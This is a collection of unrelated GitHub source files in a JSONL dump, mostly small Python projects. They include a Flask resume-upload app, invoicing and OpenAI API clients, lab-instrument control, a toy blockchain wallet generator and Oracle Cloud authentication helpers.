\\n3.Shortest Ordered Route; \\n4.Shortest Route. \\nYour choice: ', ))\r\n if f_choice == 1:\r\n return choice_distance_1()\r\n elif f_choice == 2:\r\n return choice_distance_2()\r\n elif f_choice == 3:\r\n return choice_distance_3()\r\n elif f_choice == 4:\r\n return choice_distance_4()\r\n else:\r\n print('Please, enter a value between: 1 - 2 - 3 - 4')\r\n return Function_to_use()","repo_name":"Marco-Colombi/Homework-5-ADM","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37742583817","text":"from typing import Optional\nfrom pydantic import BaseModel, Field\n\n\nclass AppsModel(BaseModel):\n brand_id: str = Field(...)\n user_id: str = Field(...)\n bundle_id: str = Field(...)\n platform: str = Field(...)\n slack_integration: bool = False\n clickup_integration: bool = False\n jira_integration: bool = False\n\n class Config:\n allow_population_by_field_name = True\n schema_extra = {\n \"example\": {\n \"brand_id\": \"60a6c72d470fa98f64464cbc\",\n \"user_id\": \"60a57e1d1201f43c9c51c044\",\n \"bundle_id\": \"aaa.bbb.ccc.beta\",\n \"platform\": \"Android\",\n \"slack_integration\": False,\n \"clickup_integration\": False,\n \"jira_integration\": False,\n }\n }\n\n\nclass UpdateAppsModel(BaseModel):\n brand_id: Optional[str]\n user_id: Optional[str]\n bundle_id: Optional[str]\n platform: Optional[str]\n slack_integration: Optional[bool]\n clickup_integration: Optional[bool]\n jira_integration: Optional[bool]\n\n class Config:\n schema_extra = {\n \"example\": {\n \"brand_id\": \"60a6c72d470fa98f64464cbc\",\n \"user_id\": \"60a57e1d1201f43c9c51c044\",\n \"bundle_id\": \"aaa.bbb.ccc.beta\",\n \"platform\": \"Android\",\n \"slack_integration\": False,\n \"clickup_integration\": False,\n \"jira_integration\": False,\n }\n }\n","repo_name":"ertyurk/bugme-backend","sub_path":"app/models/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73393166826","text":"import os\nfrom flask import (Flask,session,flash, redirect, render_template, request, url_for, send_from_directory)\nimport csv\n\n\napp = Flask(__name__,template_folder=\"templates\")\napp.config.from_object(__name__) \n\napp.config['UPLOAD_FOLDER'] = 'Upload-Resume'\napp.config['UPLOAD_JD_FOLDER'] = 'Upload-JD'\n\n\ndef getfilepath(loc):\n temp = str(loc).split('\\\\')\n return temp[-1]\n\n\n# Route for handling the login page logic\n@app.route('/', methods=['GET', 'POST'])\ndef login():\n error = None\n if request.method == 'POST':\n print(request.form['username'])\n print(request.form['password'])\n if request.form['username'] != 'admin@gmail.com' or request.form['password'] != 'admin':\n error = 'Invalid Credentials. Please try again.'\n else:\n return redirect(url_for('index'))\n return render_template('Sign_in.html', error=error)\n\n\n@app.route(\"/index\")\ndef index():\n return render_template('index.html')\n\n@app.route(\"/candidate\")\ndef main():\n return render_template('candidate_resume.html')\n \n\n@app.route(\"/jobs\", methods=['GET', 'POST'])\ndef job():\n error = None\n x = os.listdir(app.config['UPLOAD_JD_FOLDER'])\n return render_template('jobs.html',name=x)\n\n\n@app.route(\"/checker\")\ndef ch():\n return render_template('resume_checker.html')\n\n@app.route(\"/res\")\ndef res1():\n workingdir = os.path.abspath(os.getcwd())\n filepath = workingdir + '/resume_files'\n return send_from_directory(filepath, 'Akhil.profile.pdf')\n\n@app.route(\"/res2\")\ndef res2():\n workingdir = os.path.abspath(os.getcwd())\n filepath = workingdir + '/resume_files'\n return send_from_directory(filepath, 'AnilAgarwal.pdf')\n\n@app.route(\"/res3\")\ndef res3():\n workingdir = os.path.abspath(os.getcwd())\n filepath = workingdir + '/resume_files'\n return send_from_directory(filepath, 'Dhruvi.pdf')\n\n@app.route(\"/res4\")\ndef res4():\n workingdir = os.path.abspath(os.getcwd())\n filepath = workingdir + '/resume_files'\n return send_from_directory(filepath, 'Jennifer M. Conte.pdf')\n\n@app.route(\"/res5\")\ndef res5():\n workingdir = os.path.abspath(os.getcwd())\n filepath = workingdir + '/resume_files'\n return send_from_directory(filepath, 'Akhil.profile.pdf')\n\n@app.route(\"/res6\")\ndef res6():\n workingdir = os.path.abspath(os.getcwd())\n filepath = workingdir + '/resume_files'\n return send_from_directory(filepath, 'Rajesh_k.pdf')\n\n@app.route(\"/JD\")\ndef JD():\n x = os.listdir(app.config['UPLOAD_FOLDER'])\n workingdir = os.path.abspath(os.getcwd())\n filepath = workingdir + '/JD_files'\n return render_template('jobs.html', name = x)\n #return send_from_directory(name = x)\n\n@app.route('/Upload-Resume/')\ndef custom_static(filename):\n print(filename)\n return send_from_directory('./Upload-JD', filename)\n\n# Upload files\n@app.route(\"/upload\", methods=['POST'])\ndef upload_file():\n Error = None\n if request.method=='POST':\n #upload Job Description\n if 'Jdfiles'in request.files:\n filelist = [ f for f in os.listdir(app.config['UPLOAD_JD_FOLDER']) ] \n x = os.listdir(app.config['UPLOAD_JD_FOLDER'])\n for f in request.files.getlist('Jdfiles'):\n if f.filename in x:\n Error = \"All Ready \"+f.filename +\" Existed\"\n else:\n f.save(os.path.join(app.config['UPLOAD_JD_FOLDER'], f.filename)) \n x = os.listdir(app.config['UPLOAD_JD_FOLDER'])\n return render_template('jobs.html', name = x)\n \n #upload Resume\n if 'Resumefiles' in request.files:\n filelist = [ f for f in os.listdir(app.config['UPLOAD_FOLDER']) ] \n x = os.listdir(app.config['UPLOAD_FOLDER'])\n for f in request.files.getlist('Resumefiles'):\n if f.filename in x:\n Error = \"All Ready \"+f.filename +\" Existed\"\n else:\n f.save(os.path.join(app.config['UPLOAD_FOLDER'], f.filename)) \n x = os.listdir(app.config['UPLOAD_FOLDER'])\n return render_template('candidate_resume.html',name = x)\n\"\"\" \n# Fetch data\ndef source_data():\n x = os.listdir(app.config['UPLOAD_FOLDER'])\n fields = ['Candidate', 'Name', 'Email', 'Phone no','Skills','Qualification','Experience','Company Name'] \n \n # name of csv file \n filename = \"records.csv\"\n workingdir = os.path.abspath(os.getcwd())\n filepath = workingdir + 'Results'\n # writing to csv file \n with open((os.path.join(filepath, filename)), 'w') as csvfile: \n # creating a csv writer object \n csvwriter = csv.writer(csvfile) \n\n # writing the fields \n csvwriter.writerow(fields) \n\n # writing the data rows \n #csvwriter.writerows(rows)\n df = pandas.read_csv((os.path.join(filepath, filename), index_col=False, header=0);\n serie = df.ix[0,:]\n print(serie) \n\"\"\" \nif __name__ == '__main__':\n app.run(debug=True ,use_reloader=False)","repo_name":"geet121/Resume-parser-subtas","sub_path":"Resume_Parser.py","file_name":"Resume_Parser.py","file_ext":"py","file_size_in_byte":5012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36829159508","text":"import http.client\nimport json\n\nconn = http.client.HTTPSConnection(\"https://backend-qa-api.facturafacil.com.pa/api\")\npayload = json.dumps({\n \"header\": {\n \"id\": 1,\n \"environment\": \"2\"\n },\n \"document\": {\n \"fd_number\": \"12\",\n \"receptor\": {\n \"type\": \"02\",\n \"name\": \"Nombre Cliente\",\n \"ruc_type\": \"1\",\n \"address\": \"Dirección Cliente\",\n \"email\": \"cliente@correo.com\",\n \"ruc\": \"123123123\"\n },\n \"items\": [\n {\n \"line\": 1,\n \"price\": 0.5,\n \"mu\": \"und\",\n \"quantity\": 1,\n \"description\": \"Producto de prueba\",\n \"taxes\": [\n {\n \"type\": \"01\",\n \"amount\": 0.035,\n \"code\": \"01\"\n }\n ],\n \"discount\": 0,\n \"internal_code\": \"123123\"\n }\n ],\n \"payments\": [\n {\n \"type\": \"99\",\n \"amount\": \"0.54\",\n \"description\": \"Medio de pago de prueba\"\n }\n ],\n \"type\": \"01\",\n \"info\": \"\"\n }\n})\nheaders = {\n 'X-FF-Company': '[UUID DE FF]',\n 'X-FF-API-Key': '[KEY DE FF]',\n 'Content-Type': 'application/json',\n 'Accept': 'application/json'\n}\nconn.request(\"POST\", \"/pac/reception_fe/detailed/\", payload, headers)\nres = conn.getresponse()\ndata = res.read()\nprint(data.decode(\"utf-8\"))\n","repo_name":"Factura-Facil/ejemplos","sub_path":"python http client.py","file_name":"python http client.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36744233514","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n\nfrom typing import List\nimport math\n\n\nclass Solution:\n def recursive(self, begin: int, end: int, result: int) -> int:\n if(end - begin <= 1):\n return begin\n mid = math.floor((begin + end) / 2)\n if mid*mid == result:\n return mid\n elif mid*mid < result:\n return self.recursive(mid, end, result)\n else:\n return self.recursive(begin, mid, result)\n\n def mySqrt(self, x: int) -> int:\n if x < 0:\n return -1\n if x == 0:\n return 0\n if x <= 3:\n return 1\n if x == 4 or x == 5:\n return 2\n end = math.floor(x / 2)\n return self.recursive(1, end, x)\n\n\ndef main():\n s = Solution()\n s.mySqrt(5)\n return\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HUSTWillHe/MyLeetCode","sub_path":"solutions/69_my_sqrt.py","file_name":"69_my_sqrt.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13404270884","text":"import datetime\n\nfrom apps.order.models import SalesOrder\n\n\ndef notify_pending_transaction():\n from ..models import SalesOrder\n from lib.sent_email import EmailHandler\n message_version = []\n email_content = {}\n\n for order in SalesOrder.objects.filter(invoice_status__in=['new', 'credit', 'payment_partial']):\n if order.transaction_set.all().exists():\n invoice_remaining_amount = order.invoice_remaining_amount\n invoice_pending_days = (datetime.datetime.today().date() - order.invoice_date.date()).days\n if invoice_pending_days >= 9 and invoice_remaining_amount != 0:\n # (datetime.datetime.today().date() - order.invoice_date.date()).days >= 9 and order.invoice_remaining_amount != 0:\n message = f\"User {order.dealer.first_name} has pending amount of {invoice_remaining_amount} under the order {order.invoice_id} for more than 30 days\"\n email_content['to'] = [{\"email\": order.dealer.email, \"name\": order.dealer.first_name},]\n email_content['htmlContent'] = f\"

    Pending orders!

    {message}

    \"\n email_content['subject'] = \"You have pending Payments !\"\n\n if email_content not in message_version:\n message_version.append(email_content)\n # orders_list.append(order.invoice_id or order.id_as_text)\n subject = \"You have pending Payments !\"\n message = \"\"\n print(message, subject, message_version)\n\n print(\"\\n\")\n\n EmailHandler().email_for_bulk(message, subject, message_version)\n # EmailHandler().sent_email_now(message, subject, message_version)\n\n\ndef notify_pending_order():\n from apps.order.models import SalesOrder\n from lib.sent_email import EmailHandler\n from apps.user.models import User\n\n sent_mail = False\n message_version = []\n email_content = {}\n message = \"You have Pending orders !\"\n orders = {}\n # for user in User.objects.filter(user_role=32):\n orders_list = []\n recipient = []\n for order in SalesOrder.objects.filter(is_invoice=True):\n orders[order.dealer.email] = []\n if (datetime.datetime.today().date() - order.invoice_date.date()).days > 2 and order.invoice_remaining_amount != 0:\n orders[order.dealer.email].append(order.invoice_id)\n message = f\"Dear {order.dealer.first_name }, your orders {','.join(orders[order.dealer.email])} has been pending for more than 30 days \"\n # recipient.append(user.email)\n # email_content[user.email] = message\n email_content['to'] = [{\"email\": order.dealer.email, \"name\": order.dealer.first_name},]\n email_content['htmlContent'] = f\"

    Pending orders!

    {message}

    \"\n email_content['subject'] = \"You have pending orders !\"\n if email_content not in message_version:\n message_version.append(email_content)\n # print(\"message_version\", message_version)\n\n '''\n email_content = {\n \"name\":\"message\"\n }\n '''\n\n message = ''\n subject = {}\n subject['subject'] = \"You have pending orders \"\n subject[\"subheadline\"] = \"You have pending orders for more than 30 days\"\n # receivers = [i['to']['email'] for i in message_version]\n # import pdb;pdb.set_trace()\n print(f\"message:{message}, subject:{subject}, message_version:{message_version}\")\n EmailHandler().email_for_bulk(message, subject, message_version)\n # EmailHandler().sent_email_now(message, subject, message_version)\n\n \"\"\"\n message_version = [\n # //Definition for Message Version 1\n {\n \"to\": [\n {\n \"email\": \"bob@example.com\",\n \"name\": \"Bob Anderson\"\n },\n ],\n \"htmlContent\": \"

    Modified header!

    This is still a paragraph

    \",\n \"subject\": \"We are happy to be working with you\"\n },\n ]\n \"\"\"\n print(\"\\n\")\n","repo_name":"abhishekfegno/maxpolo_b2b","sub_path":"apps/order/cron/cron_tab.py","file_name":"cron_tab.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22112909256","text":"# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n\"\"\"\n### BEGIN NODE INFO\n[info]\nname = RohdeSchwarz Server\nversion = 1.2\ndescription = \n\n[startup]\ncmdline = %PYTHON% %FILE%\ntimeout = 20\n\n[shutdown]\nmessage = 987654321\ntimeout = 5\n### END NODE INFO\n\"\"\"\n\nfrom labrad.server import setting\nfrom labrad.gpib import GPIBManagedServer, GPIBDeviceWrapper\nfrom twisted.internet.defer import inlineCallbacks, returnValue\n\nclass RSSMB100AWrapper(GPIBDeviceWrapper):\n @inlineCallbacks\n def initialize(self):\n self.frequency = yield self.getFrequency()\n self.amplitude = yield self.getAmplitude()\n self.output = yield self.getOutput()\n self.phase = None\n\n @inlineCallbacks\n def getFrequency(self):\n frequency = yield self.query('SOURce:FREQuency?').addCallback(float)\n self.frequency = frequency / 10.**6 #now in MHz\n returnValue(self.frequency)\n\n @inlineCallbacks\n def getAmplitude(self):\n self.amplitude = yield self.query('POWer?').addCallback(float)\n returnValue(self.amplitude)\n \n @inlineCallbacks\n def getOutput(self):\n state = yield self.query('OUTput:STATe?').addCallback(float)\n self.state = bool(state)\n returnValue(self.state)\n \n @inlineCallbacks\n def setFrequency(self, f):\n if self.frequency != f:\n yield self.write('SOURce:FREQuency {}MHZ'.format(float(f)))\n self.frequency = f\n \n @inlineCallbacks\n def setAmplitude(self, a):\n if self.amplitude != a:\n yield self.write('POWer {}'.format(float(a)))\n self.amplitude = a\n\n @inlineCallbacks\n def setOutput(self, out):\n if self.output != out:\n yield self.write('OUTput:STATe {}'.format(int(out)))\n self.output = out\n \n @inlineCallbacks\n def make_new_list(self, inputs, name):\n freqs,powers = zip(*inputs)\n freqString = \"SOURce1:LIST:FREQ\" + \"\".join([\" {} MHZ,\".format(freq) for freq in freqs])\n powerString = \"SOURce1:LIST:POW\" + \"\".join([\" {}dBm,\".format(pwr) for pwr in powers])\n #deleting the last comma\n freqString = freqString[:-1]\n powerString = powerString[:-1]\n yield self.write('SOURce1:LIST:SEL \"{}\"'.format(name))\n yield self.write(freqString)\n yield self.write(powerString)\n \n @inlineCallbacks\n def activate_list_mode(self, state):\n if state:\n yield self.write(\"SOURce1:LIST:MODE STEP\") #sets the step mode\n yield self.write(\"SOURce1:LIST:TRIGger:SOURce EXT\") #external triggering\n yield self.write(\"SOURce1:FREQuency:MODE LIST\") #activates step mode (output must be on)\n else:\n yield self.write(\"SOURce1:FREQuency:MODE CW\")\n \n @inlineCallbacks\n def reset_list(self):\n yield self.write(\"SOURce1:LIST:RES\")\n \n @inlineCallbacks\n def set_phase(self, phase):\n phase = round(phase, 1)\n if not -359.9<=phase<=359.9: raise Exception (\"Phase out of range\")\n yield self.write('SOURce:PHASe {}DEG'.format(phase))\n self.phase = phase\n \nclass RohdeSchwarzServer(GPIBManagedServer):\n \"\"\"Provides basic CW control for Rohde&Schwarz SMB100A RF Generators\"\"\"\n name = 'RohdeSchwarz Server'\n deviceName = 'Rohde&Schwarz SMB100A'\n deviceWrapper = RSSMB100AWrapper\n\n @setting(10, 'Frequency', f=['v[MHz]'], returns=['v[MHz]'])\n def frequency(self, c, f=None):\n \"\"\"Get or set the CW frequency.\"\"\"\n dev = self.selectedDevice(c)\n if f is not None:\n yield dev.setFrequency(f)\n returnValue(dev.frequency)\n\n @setting(11, 'Amplitude', a=['v[dBm]'], returns=['v[dBm]'])\n def amplitude(self, c, a=None):\n \"\"\"Get or set the CW amplitude.\"\"\"\n dev = self.selectedDevice(c)\n if a is not None:\n yield dev.setAmplitude(a)\n returnValue(dev.amplitude)\n\n @setting(12, 'Output', os=['b'], returns=['b'])\n def output_state(self, c, os=None):\n \"\"\"Get or set the output status.\"\"\"\n dev = self.selectedDevice(c)\n if os is not None:\n yield dev.setOutput(os)\n returnValue(dev.output)\n \n @setting(13,'Activate List Mode', state = 'b', returns = '')\n def activate_list(self, c, state):\n \"\"\"Activate the List Mode\"\"\"\n dev = self.selectedDevice(c)\n yield dev.activate_list_mode(state)\n# if bool(state):\n# #make sure the list goes to the first index after programming\n# print 'resetting'\n# yield dev.reset_list()\n \n @setting(14,\"Reset List\", returns = '')\n def reset_list(self, c):\n \"\"\"Reset the List for List Mode\"\"\"\n dev = self.selectedDevice(c)\n yield dev.reset_list()\n \n @setting(15,\"New List\", inputs = '*(vv)', name = 's', returns = '')\n def make_new_list(self, c, inputs, name = 'unnamed'):\n \"\"\"Make a new list, input is a list of tuples in the form (freq in Mhz, power in dBm)\"\"\"\n dev = self.selectedDevice(c)\n yield dev.make_new_list(inputs.astuple, name)\n \n \n @setting(16,\"Set Phase\", phase = 'v', returns = '')\n def set_phase(self, c, phase):\n \"\"\"Sets the phase of the output, useful for phase locked applications\"\"\"\n dev = self.selectDevice(c)\n yield dev.set_phase(phase)\n\n__server__ = RohdeSchwarzServer()\n\nif __name__ == '__main__':\n from labrad import util\n util.runServer(__server__)\n","repo_name":"HaeffnerLab/Haeffner-Lab-LabRAD-Tools","sub_path":"gpibservers/rs_smb100a.py","file_name":"rs_smb100a.py","file_ext":"py","file_size_in_byte":6043,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"4754167097","text":"import argparse\nimport pathlib\nimport sys\nimport yaml\nimport logging\n\nimport pandas as pd\nfrom grist_api import GristDocAPI\n\nfrom cyoa_archives.grist.api import GristAPIWrapper\n\nlogger = logging.getLogger(__name__)\n\n# Parse args\nparser = argparse.ArgumentParser(\n description=\"Parse a subreddit for submissions using praw.\"\n)\nparser.add_argument(\"-c\", \"--config_file\", help=\"Configuration file to use\")\nargs = parser.parse_args()\nif args.config_file:\n filepath = pathlib.Path(args.config_file)\n try:\n with open(filepath) as f:\n config = yaml.safe_load(f)\n except OSError:\n print(f\"Could not read file: {filepath}\")\n sys.exit(1)\n\n\n# Set up API\napi = GristAPIWrapper.from_config(config.get('grist'))\n\nbackup_api = GristAPIWrapper.from_config(config.get('grist'))\nbackup_api.document_id = 'CENSORED'\nbackup_api.api = GristDocAPI(backup_api.document_id, server=backup_api.server_url, api_key=backup_api.api_key)\n\ngrist_pd = backup_api.fetch_table_pd('CYOAs', col_names=['id', 'pov', 'content_tags'])\n# print(grist_pd)\n\nresult_list = []\nfor index, row in grist_pd.iterrows():\n g_id = row['id']\n pov = row['pov']\n tags = row['content_tags']\n\n result_list.append({\n 'id': g_id,\n 'pov': pov,\n 'content_tags': tags\n })\n# print(result_list)\n\n# Update grist\napi.update_records('CYOAs', result_list, mock=False, prompt=True)\n","repo_name":"anonekama/cyoa-archives","sub_path":"code_snippets/fix_pov_contenttags.py","file_name":"fix_pov_contenttags.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30846177085","text":"#!/usr/bin/env /Library/Frameworks/Python.framework/Versions/3.11/bin/python3\n\nimport openai\nimport pyperclip\nimport os\n\n# Retrieve OpenAI API key from environment variable\nopenai.api_key = os.environ.get('KMVAR_OPENAI_API_KEY')\n\n# Get text from clipboard\nhighlightedText = pyperclip.paste()\n\n# Prompt Specifics\nsystemMessage = \"You are an excellent summarizer.\"\npromptTemplate = f\"Summarize the following: {highlightedText}\"\n\nresponse = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": systemMessage},\n {\"role\": \"user\", \"content\": promptTemplate}\n ]\n)\n\n# Print the generated text to standard output\nprint(response.choices[0].message.content.strip())\n","repo_name":"OldmanRahul/Twitter-Shares","sub_path":"KM-OpenAi-Summarize.py","file_name":"KM-OpenAi-Summarize.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1439352728","text":"import json\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Hash import SHA256\nfrom Crypto.Hash import RIPEMD160\nimport binascii\nimport hashlib\n\nclass Hash:\n\n @staticmethod\n def hash(block):\n \"\"\"\n Creates a SHA-256 hash of a Block\n :param block: Block\n \"\"\"\n\n # We must make sure that the Dictionary is Ordered, or we'll have inconsistent hashes\n block_string = json.dumps(block, sort_keys=True).encode()\n return hashlib.sha256(block_string).hexdigest()\n\n @staticmethod\n def calculate_hash(data, hash_function):\n \"\"\"\n function for creating hashes of keys for wallet generation\n returns a SHA256 or RIPEMD160 hash depending\n on the hash function selected in the function call.\n \"\"\"\n data = bytearray(data, \"utf-8\")\n if hash_function == \"sha256\":\n h = SHA256.new()\n h.update(data)\n return h.hexdigest()\n if hash_function == \"ripemd160\":\n h = RIPEMD160.new()\n h.update(data)\n return h.hexdigest()\n\nclass Write:\n\n @staticmethod\n def write_json_wallet(data, mode, filename='data/wallet.json'):\n \"\"\"\n write a generated wallet to wallet.json\n \"\"\"\n # opens the file in write mode\n with open(filename, mode) as file:\n block_dict = json.dumps(data, indent=6)\n file.write(block_dict)\n\n @staticmethod\n def write_chain(data, filename='data/chain.json'):\n \"\"\"\n appends block to chain.json\n \"\"\"\n # opens the file in append mode\n with open(filename, 'a') as file:\n block_dict = json.dumps(data)\n file.write(block_dict)\n file.write('\\n')\n\nclass Generate:\n @staticmethod\n def generate_wallet():\n \"\"\"\n function for the generation of wallets\n \"\"\"\n private_key = RSA.generate(4096)\n private_key_plain = private_key.export_key(\"PEM\")\n public_key_plain = private_key.publickey().export_key(\"PEM\")\n public_key = private_key.publickey().export_key(\"DER\")\n public_key_hex = binascii.hexlify(public_key).decode(\"utf-8\")\n public_key_hash = Hash.calculate_hash(Hash.calculate_hash(public_key_hex, hash_function=\"sha256\"),\n hash_function=\"ripemd160\")\n\n wallet_data = {\n 'private key': private_key_plain.decode(),\n 'public key': public_key_plain.decode(),\n 'public key hex': public_key_hex,\n 'public key hash': public_key_hash\n }\n Write.write_json_wallet(data=wallet_data, mode='w')\n\n\nHash()\n","repo_name":"ock666/Serpentcoin","sub_path":"src/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"38983720229","text":"import cv2\nimport numpy as np\n\ncam = cv2.VideoCapture(\"http://192.168.43.1:7777/video?x.mjpg\") #use your own IP address or\n#for webcam use 0 or other external camera use 1\nwidth = int(cam.get(cv2.CAP_PROP_FRAME_WIDTH))\nheight = int(cam.get(cv2.CAP_PROP_FRAME_HEIGHT))\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nvid = cv2.VideoWriter('output.avi', fourcc, 10, (width,height))\nprint(width)\nprint(height)\n\nwhile(True):\n tf, frame = cam.read()\n vid.write(frame)\n cv2.imshow('Single Frame',frame)\n key = cv2.waitKey(1)\n if key == 27: #esc key\n break\n elif key == ord('x'):\n print(\"You have pressed the letter X\")\n\ncam.release()\nvid.release()\ncv2.destroyAllWindows()\n","repo_name":"Omprakash76/Capture_video_From_CCTV","sub_path":"capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"7050385911","text":"\n#OBJECTIVE:\n# Create a script that takes a command line input, converts that command line inpute to snake case, then makes that\n# command line input the filename and title of a new file in my feynman_technique folder in my vault. The script will\n# then append 3 lines of space, followed by the text \"press R to insert explanation here,\" followed by 3 more lines of\n# space. This will then do the same thing with a simplified explanation.\n\n#Modules\nimport os\n\n# Take command line input of concept to be learned\n\ndef concept_input():\n\tconcept = str(input(\"What concept would you like to learn? \"))\n\treturn (concept)\n\n# print(concept_input())\n\n\n# Convert to snake case\n\ndef sneky_case(string):\n string = list(string);\n n = len(string);\n \n for i in range(n) :\n if (string[i] == \" \") :\n string[i] = \"_\" ;\n\n else:\n string[i] = string[i].lower();\n\n string = \"\".join(string)\n return string\n\nprint(sneky_case(\"Poopy Goopy Doopy\"))\n# print(sneky_case(concept_input))\n\n\n# Make snake case phrase into file name, as well as append date\n\n\n# Append original name, date in Month/dd/yyyy format, 3 blank lines, \"Complex Description\", , 3 blank lines, \"Simplified Description\", \n\n\n\n# Vim filename starting at appropriate line, most likely under Complex Description.\n\n","repo_name":"cmaxreilly/shell_scripts","sub_path":"feyn.py","file_name":"feyn.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7885017651","text":"import oci\nimport os\n\n##########################################################################\n# Create signer for Authentication\n# Input - config_profile and is_instance_principals and is_delegation_token\n# Output - config and signer objects\n##########################################################################\ndef create_signer(config_profile, is_instance_principals, is_delegation_token):\n\n # if instance principals authentications\n if is_instance_principals:\n try:\n signer = oci.auth.signers.InstancePrincipalsSecurityTokenSigner()\n config = {'region': signer.region, 'tenancy': signer.tenancy_id}\n return config, signer\n\n except Exception:\n print_header(\"Error obtaining instance principals certificate, aborting\")\n raise SystemExit\n\n # -----------------------------\n # Delegation Token\n # -----------------------------\n elif is_delegation_token:\n\n try:\n # check if env variables OCI_CONFIG_FILE, OCI_CONFIG_PROFILE exist and use them\n env_config_file = os.environ.get('OCI_CONFIG_FILE')\n env_config_section = os.environ.get('OCI_CONFIG_PROFILE')\n\n # check if file exist\n if env_config_file is None or env_config_section is None:\n MakeLog(\"*** OCI_CONFIG_FILE and OCI_CONFIG_PROFILE env variables not found, abort. ***\")\n MakeLog(\"\")\n raise SystemExit\n\n config = oci.config.from_file(env_config_file, env_config_section)\n delegation_token_location = config[\"delegation_token_file\"]\n\n with open(delegation_token_location, 'r') as delegation_token_file:\n delegation_token = delegation_token_file.read().strip()\n # get signer from delegation token\n signer = oci.auth.signers.InstancePrincipalsDelegationTokenSigner(delegation_token=delegation_token)\n\n return config, signer\n\n except KeyError:\n MakeLog(\"* Key Error obtaining delegation_token_file\")\n raise SystemExit\n\n except Exception:\n raise\n\n # -----------------------------\n # config file authentication\n # -----------------------------\n else:\n config = oci.config.from_file(\n oci.config.DEFAULT_LOCATION,\n (config_profile if config_profile else oci.config.DEFAULT_PROFILE)\n )\n signer = oci.signer.Signer(\n tenancy=config[\"tenancy\"],\n user=config[\"user\"],\n fingerprint=config[\"fingerprint\"],\n private_key_file_location=config.get(\"key_file\"),\n pass_phrase=oci.config.get_config_value_or_default(config, \"pass_phrase\"),\n private_key_content=config.get(\"key_content\")\n )\n return config, signer\n","repo_name":"AnykeyNL/OCI-AutoScale","sub_path":"OCIFunctions.py","file_name":"OCIFunctions.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"37"} +{"seq_id":"13575976372","text":"from potential import *\nimport os\nimport time\nimport subprocess\n\ndef RecordSpec(N):\n Theta = np.linspace(-1, 1, N) #cos(theta)\n os.chdir(r'C:\\Users\\USER\\Desktop\\Xe-O2 Level')\n spec=open(r\"C:\\Users\\USER\\Desktop\\Xe-O2 Level\\Spectrum(theta)1.txt\",'w')\n for theta in Theta:\n print(theta)\n PES(10**4, r=-1, th = theta )\n file = open(r\"C:\\Users\\USER\\Desktop\\Xe-O2 Level\\Level.input.txt\",'r')\n f=file.readlines() # заменить нужно с 9 строки по 10008 включительно для N=10**4\n file.close()\n surf = open(r\"C:\\Users\\USER\\Desktop\\Xe-O2 Level\\Potential.txt\",'r')\n s = surf.readlines()\n surf.close()\n f[9:10009] = s[::]\n file = open(r\"C:\\Users\\USER\\Desktop\\Xe-O2 Level\\Level.input.txt\",'w')\n file.writelines(f)\n file.close()\n # os.startfile(r'C:\\Users\\USER\\Desktop\\Xe-O2 Level\\Level.bat')\n os.system(r'start Level.bat')\n time.sleep(3)\n file=open(r\"C:\\Users\\USER\\Desktop\\Xe-O2 Level\\fort.7\",'r')\n f=file.readlines() #спектр находится с 3-ей позиции до конца\n file.close()\n for i in f[3:]:\n spec.writelines(i.strip().split()[2]+' ')\n spec.write('\\n')\n\n spec.close()\n","repo_name":"ethylking/partition_function_Xe-O2","sub_path":"RecordSpectra.py","file_name":"RecordSpectra.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3937493764","text":"import random\n\na = 1\nb = 2**10\n\nwhile True:\n # num = random.randint(a, b)\n num = int((a+b)/2)\n ans = input(f\"is it {num}? (+, -, y)\")\n\n if ans == '-':\n b = num\n elif ans == '+':\n a = num\n else:\n print(f\"it's {num}\")\n break\n","repo_name":"pymft/mft-01","sub_path":"S05/intro_to_stdlib/computer_guess_the_number.py","file_name":"computer_guess_the_number.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} 